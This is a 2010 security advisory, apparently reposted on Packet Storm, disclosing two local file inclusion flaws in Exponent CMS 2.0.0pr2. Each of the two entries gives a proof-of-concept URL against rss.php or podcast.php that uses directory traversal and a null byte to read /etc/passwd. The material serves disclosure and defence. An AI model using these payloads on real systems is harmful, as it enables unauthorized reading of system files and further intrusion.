Exponent CMS 2.0.0pr2 Local File Inclusion

2010-12-07T00:00:00
ID PACKETSTORM:96465
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-12-07T00:00:00

Description

                                        
                                            `=============================  
Vulnerability ID: HTB22718  
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html  
Product: Exponent CMS  
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )   
Vulnerable Version: 2.0.0pr2  
Vendor Notification: 22 November 2010   
Vulnerability Type: Local File Inclusion  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/rss.php" script to properly sanitize user-supplied input in module variable.  
  
The following PoC is available:  
  
http://exponent/rss.php?module=../../../../../../../etc/passwd%00  
  
  
=============================  
Vulnerability ID: HTB22717  
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html  
Product: Exponent CMS  
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )   
Vulnerable Version: 2.0.0pr2  
Vendor Notification: 22 November 2010   
Vulnerability Type: Local File Inclusion  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: High   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "/podcast.php" script to properly sanitize user-supplied input in module variable.  
  
The following PoC is available:  
  
  
http://exponent/podcast.php?module=../../../../../../../etc/passwd%00  
  
  
`